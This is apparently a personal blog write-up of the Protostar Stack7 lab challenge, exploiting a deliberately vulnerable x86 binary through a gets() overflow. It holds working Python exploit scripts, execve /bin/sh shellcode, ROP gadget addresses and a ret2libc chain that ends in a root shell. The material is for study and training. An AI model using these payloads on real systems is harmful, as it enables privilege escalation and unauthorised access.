Written by Crawl3r
on April 03, 2020

B2B - Protostar, Stack7 (x86)

Introduction:

B2B is a series I have forced upon myself to make sure my basics are covered when it comes to exploitation. After passing my OSCE, I took a little break from exploitation to focus on a few work aspects, but now I am hungry for more lower level nonsense.

This series will focus mainly on exploitation challenges which cover various techniques. First of which, is the stack overflow challenges within the Protostar image from “exploit education” found here. I gave myself two main rules to stick to whilst working through all these challenges.

1) Don’t read the C source code for each challenge, only the hints section if required

2) Don’t read other peoples write ups for these challenges unless I have already finished it and want to see other routes to further my interest

Stack 7

The eighth and final stack challenge of Protostar is “Stack 7”. I approached each challenge with a similar set of steps, so each post will likely follow a similar template(ish). Including initial running, inspecting the disassembly of the binary and some other specific steps in between before finally crafting a payload and owning the process.

Our initial use of the program identified the following:

$ ./stack7
input path please: test
got path test

The program simply appears to take a single input, presumably does something with it in the background and then prints some output based on the value that was specified. In this case, the binary took the string “test” as it’s “input path”, and printed “got path test”. This is a different set of output compared to our previous challenges, which looks like we might have a new challenge on our hands.

Similar to the last challenge, I started this one off by looking at the hints. I knew it would be another stack based buffer overflow, however I was more curious to see what direction they had decided to go in since we have now done an overflow with our own shellcode.

The hints for this challenge are:

Stack7 introduces return to .text to gain code execution.
The metasploit tool “msfelfscan” can make searching for suitable instructions very easy, otherwise looking through objdump output will suffice.

From these hints alone, we can see this challenge will likely be similar to the previous challenge - which originally hinted at ret2libc and ROP. The disassembled binary will likely give us some return address restrictions again, possibly in the form of an “and”/”cmp” set of instructions again.

Similar to ret2libc, I won’t go into too much detail about ROP and what it is. However, once again I will drop a few points below about ROP and why would want to use it:

Uses precompiled code called ‘gadget’
A gadget is the instructions that lie just before a ‘ret’ instruction
Chaining gadgets give a flow of execution that is required. Each gadget will return into the next, giving us a decent amount of control providing the required code exists within the compiled binary
ROP bypasses DEP/non-executable stack problems
ROP actually makes me realise I don’t know much about exploitation, but damn it feels good when a chain works!

Although we can already see some similarities with the previous challenge, let’s continue as normal and use GDB to look further into the binary. Listing the functions we see the following:

(gdb) info functions
All defined functions:

File stack7/stack7.c:
char *getpath(void);
int main(int, char **);

Our functions look the same so far, let’s check the disassembled code:

(gdb) disas main
Dump of assembler code for function main:
0x08048545 <main+0>:	push   ebp
0x08048546 <main+1>:	mov    ebp,esp
0x08048548 <main+3>:	and    esp,0xfffffff0
0x0804854b <main+6>:	call   0x80484c4 <getpath>
0x08048550 <main+11>:	mov    esp,ebp
0x08048552 <main+13>:	pop    ebp
0x08048553 <main+14>:	ret    
End of assembler dump.

Looking at this main() function, we can see that the main function only has one usage:

It calls the getpath() function

Now let’s disassemble getpath and see what this holds:

(gdb) disas getpath
Dump of assembler code for function getpath:
0x080484c4 <getpath+0>:	push   ebp
0x080484c5 <getpath+1>:	mov    ebp,esp
0x080484c7 <getpath+3>:	sub    esp,0x68
0x080484ca <getpath+6>:	mov    eax,0x8048620
0x080484cf <getpath+11>:	mov    DWORD PTR [esp],eax
0x080484d2 <getpath+14>:	call   0x80483e4 <printf@plt>
0x080484d7 <getpath+19>:	mov    eax,ds:0x8049780
0x080484dc <getpath+24>:	mov    DWORD PTR [esp],eax
0x080484df <getpath+27>:	call   0x80483d4 <fflush@plt>
0x080484e4 <getpath+32>:	lea    eax,[ebp-0x4c]
0x080484e7 <getpath+35>:	mov    DWORD PTR [esp],eax
0x080484ea <getpath+38>:	call   0x80483a4 <gets@plt>
0x080484ef <getpath+43>:	mov    eax,DWORD PTR [ebp+0x4]
0x080484f2 <getpath+46>:	mov    DWORD PTR [ebp-0xc],eax
0x080484f5 <getpath+49>:	mov    eax,DWORD PTR [ebp-0xc]
0x080484f8 <getpath+52>:	and    eax,0xb0000000
0x080484fd <getpath+57>:	cmp    eax,0xb0000000
0x08048502 <getpath+62>:	jne    0x8048524 <getpath+96>
0x08048504 <getpath+64>:	mov    eax,0x8048634
0x08048509 <getpath+69>:	mov    edx,DWORD PTR [ebp-0xc]
0x0804850c <getpath+72>:	mov    DWORD PTR [esp+0x4],edx
0x08048510 <getpath+76>:	mov    DWORD PTR [esp],eax
0x08048513 <getpath+79>:	call   0x80483e4 <printf@plt>
0x08048518 <getpath+84>:	mov    DWORD PTR [esp],0x1
0x0804851f <getpath+91>:	call   0x80483c4 <_exit@plt>
0x08048524 <getpath+96>:	mov    eax,0x8048640
0x08048529 <getpath+101>:	lea    edx,[ebp-0x4c]
0x0804852c <getpath+104>:	mov    DWORD PTR [esp+0x4],edx
0x08048530 <getpath+108>:	mov    DWORD PTR [esp],eax
0x08048533 <getpath+111>:	call   0x80483e4 <printf@plt>
0x08048538 <getpath+116>:	lea    eax,[ebp-0x4c]
0x0804853b <getpath+119>:	mov    DWORD PTR [esp],eax
0x0804853e <getpath+122>:	call   0x80483f4 <strdup@plt>
0x08048543 <getpath+127>:	leave  
0x08048544 <getpath+128>:	ret    
End of assembler dump.

If we look back to the stack6 challenge, our inspection of getpath was:

grow the stack by 0x68 bytes
print is called, which likely prints the ‘input path please:’ string
gets() is then used to take the user input <– buffer overflow vulnerability
an ‘and’ and ‘cmp’ instruction are done with EAX and the value ‘0xbf000000’ value. This is likely the ‘return address restriction’ stated in the hints section
the win/fail state is determined by a ‘jne’ instruction with the previously mentioned comparison. If are equal to the restricted value (after the ‘and’ calculation), we don’t jump and exit() instead. If we don’t equal that value, we jump over the exit() and carry on. This is likely our route for pwning it.

The only difference in this challenge, from an initial look is our ‘and’ and ‘cmp’ instructions. The restriction on our return address appears to be anything that starts with the the bit ‘b’, indicated by the ‘and’ calculation with the value “0xb0000000”.

This restriction has likely been adapted to prevent us from using the same exploit as before, the ret2libc payload, which is we remember was located in the “0xbf000000” - “0xbfffffff” range. As a quick test, lets use this payload again here and see what happens.

stack6.py:

import struct
def build():
    libc_base = 0xb7e97000
    binsh_offset = 0x11f3bf

    string_addr = libc_base + binsh_offset
    system_addr = 0xb7ecffb0
    exit_addr = 0xb7ec60c0

    padding = 'A' * 80

    payload = padding
    payload += struct.pack("I", system_addr)
    payload += struct.pack("I", exit_addr)
    payload += struct.pack("I", string_addr)
    print payload

build()

Running this against our new vulnerable target fails but helps us identify a few things:

$ (python /tmp/stack6.py; cat) | ./stack7
input path please: bzzzt (0xb7ecffb0)
ls
$ 

The points to take away from this is:

we can’t ret2libc due to the 0xb0000000 address restriction
we are vulnerable to a buffer overflow
our offset to EIP appears to be the same
we should have a rough skeleton for an exploit, stack7.py:

import struct
def build():
    padding = 'A' * 80
    addr = 0xdeadbeef

    payload = padding
    payload += struct.pack("I", addr)
    print payload

build()

The first thing we now need to do is figure out an attack plan on getting ROP to pop a shell. I haven’t done much of this stuff before with x86, so I will be reading up on various blogs and non-related challenges to check out how people utilise gadgets to ‘hopefully’ pop a system shell.

An initial assumption is the following:

find a ‘pop, ret’ gadget
return into the ‘system’ call in libc (is this allowed?)
pass in the /bin/sh string into the system call

At this moment, I have no idea if this will work and I am not sure if this is a valid route to getting a shell in this case - however, let’s have a look!

</i>

So after reading various blog posts and noob guides to computers, specifically “How to use Microsoft Word” and “Computers for Dummies” I realised my above assumption was… sort of far off? Returning to .text pretty much just allows me to:

overflow and get EIP
use a gadget to ret to .text via a specified value
execute custom defined shellcode

Again, without too much reading. If I had a gadget that did a ‘pop, ret’ set of instructions. I could pop some junk off the stack, return to a location within my buffer overflow payload (.text section maybe?) and then finally land in the my shellcode.

First of all, let’s check the “.text” section of the process:

objdump -s stack7

<snipped>
Contents of section .text:
8048410 31ed5e89 e183e4f0 50545268 60850408  1.^.....PTRh`...
8048420 68708504 08515668 45850408 e883ffff  hp...QVhE.......
<snipped>

The above tells us that our “.text” section starts at “0x08048410” which, luckily, does not land in our restricted memory address value of “0xb0000000” which is a good start!

Now we want to try and find a gadget. Looking through the objdump of the binary, I can manually highlight a few:

80485f7:	5b                   	pop    %ebx
80485f8:	5d                   	pop    %ebp
80485f9:	c3                   	ret

80485c5:	5b                   	pop    %ebx
80485c6:	5e                   	pop    %esi
80485c7:	5f                   	pop    %edi
80485c8:	5d                   	pop    %ebp
80485c9:	c3                   	ret

8048563:	5d                   	pop    %ebp
8048564:	c3                   	ret

(there are more, but let’s used one of these).

So, the above list of gadgets can either all be used in their full extent or they could be shrunk a bit. For example, I realistically only need a single pop and ret, so I could use any of the following address:

0x080485f8 -> pop EBP, ret 
0x080485c8 -> pop EBP, ret
0x08048563 -> pop EBP, ret

For our first attempt, let’s use “0x080485f8” as our EIP overwrite. So far, our payload will need to be:

junk + pop/ret + (pop junk)

However, at this point, our gadget will literally pop a 4 byte piece of junk off the stack and then return to nothing as the address will be whatever is already in memory at that time.

Ideally, we want our payload to be:

junk + pop/ret + (pop junk) + return address + shellcode

Let’s fill in these 2 new values, the first of which is a target return address that we require! Let’s fire a tonne of values into the process and see where we land:

(gdb) x/30wx $esp
0xbffffca0:	0x43434343	0x44444444	0x45454545	0x46464646
0xbffffcb0:	0x47474747	0x48484848	0x49494949	0x4a4a4a4a
0xbffffcc0:	0x4b4b4b4b	0x4c4c4c4c	0x4d4d4d4d	0x4e4e4e4e
0xbffffcd0:	0x4f4f4f4f	0x50505050	0x51515151	0x52525252
0xbffffce0:	0x53535353	0xb7fd7f00	0x00000000	0x00000000
0xbffffcf0:	0xbffffd28	0x2a2f9303	0x006e8513	0x00000000
0xbffffd00:	0x00000000	0x00000000	0x00000001	0x08048410
0xbffffd10:	0x00000000	0xb7ff6210

Okay, so this is where I tripped a little bit. All our address start with the ‘b’ bit, which, is a banned value for our return address… but me being me, I’m pretty derpy, I missed the point that our return address has already been checked and signed as legitimate because of the above gadget “0x080485f8”. In theory, if I now ‘return’ from the gadget into the stack, we should be allowed to perform some execution… right?

Focusing on the memory above, let’s start to swap out some of the values manually to see where we should technically be able to return too. Remember, our ‘planned’ payload is the following:

junk + pop/ret + (pop junk) + return address + shellcode

A quick breakdown of the values swapped in the stack can be seen here:

43434343 will be our “pop junk”, used by our pop/ret gadget
44444444 will be our return address, this could be somewhere in the above stack dump
45454545 could be the start of our shellcode, meaning 44444444 would be the address of this point in memory in this case

Let’s try the following as our payload. Note, we have added our gadget, the required junk, a return address and our own shellcode:

import struct
def build():
    padding = 'A' * 80
    pop_ret_gadget = 0x080485f8
    pop_junk = "BBBB"
    ret_addr = 0xbffffcd0
    nop_sled = "\x90" * 100
    shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

    payload = padding
    payload += struct.pack("I", pop_ret_gadget)
    payload += pop_junk
    payload += struct.pack("I", ret_addr)
    payload += nop_sled
    payload += shellcode
    print payload

build()

Amazingly, look what happened in GDB!!

$ python /tmp/stack7.py > /tmp/stack7
$ gdb stack7
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack7...done.
(gdb) r < /tmp/stack7
Starting program: /opt/protostar/bin/stack7 < /tmp/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�AAAAAAAAAAAA�BBBB��������������������������������������������1�Ph//shh/bin��PS��

Executing new program: /bin/dash

Program exited normally.

We can see that the payload worked, and we were able to ROP our way into a “/bin/dash”, which naturally quit our instantly. Let’s try it outside of GDB and see what happens:

$ python /tmp/stack7.py | ./stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�AAAAAAAAAAAA�BBBB��������������������������������������������1�Ph//shh/bin��PS��

Illegal instruction

… 0____o …

Well, could this be padding like before? Let’s extend our NOP sled a bit, and offset our return address too just incase the offsets in the debugger were breaking our payload.

A change of plan

After embarrassingly failing the above, I moved on with my life and wanted to try and get my original assumption working, because in theory… I should be able to re-purpose my ret2libc exploit from stack6. But instead of returning to libc, I initially return into the ret2libc payload… ultimately, my exploit will digivolve (best show) into a ret2ret2libc attack… right?

My attempted payload for this was the original stack6.py script + a new return address as commented below:

import struct
def build():
    libc_base = 0xb7e97000
    binsh_offset = 0x11f3bf

    ret_addr = 0x08048544 # getpath() ret
    string_addr = libc_base + binsh_offset
    system_addr = 0xb7ecffb0
    exit_addr = 0xb7ec60c0

    padding = 'A' * 80

    payload = padding
    payload += struct.pack("I", ret_addr)
    payload += struct.pack("I", system_addr)
    payload += struct.pack("I", exit_addr)
    payload += struct.pack("I", string_addr)
    print payload

build()

Well, okay. The biggest thing I learnt here… is I need to follow my gut instinct and not second guess myself. Check out the following output:

$ (python /tmp/stack7b.py; cat) | ./stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAAAAAAAD����`췿c��
whoami
root
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)

I was literally able to take my ret2libc payload, change the EIP overwrite to be a ‘ret’ gadget and just return into my original payload, bypassing the tighter restriction and popping my root shell before cleanly exiting with the exit() function.

That was awesome! If you have followed me along this journey of the Protostar stack challenges, I thank you. I hope you learnt something and enjoyed my derps along the way! Next up, String Format vulnerabilities :)

← → Top